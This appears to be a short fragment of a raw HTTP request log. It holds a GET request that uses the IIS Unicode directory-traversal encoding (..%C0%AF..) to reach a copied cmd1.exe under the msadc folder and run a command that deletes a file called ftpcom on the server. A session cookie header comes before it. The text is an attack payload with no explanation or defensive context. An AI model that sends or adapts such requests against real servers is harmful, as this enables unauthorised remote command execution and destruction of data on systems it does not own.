Connection: Keep-Alive
Cookie: ASPSESSIONIDGQQGGQZK=LPGNFIPAECCHCHMAFOIKAOEB
GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+del+ftpcom HTTP/1.1
EOF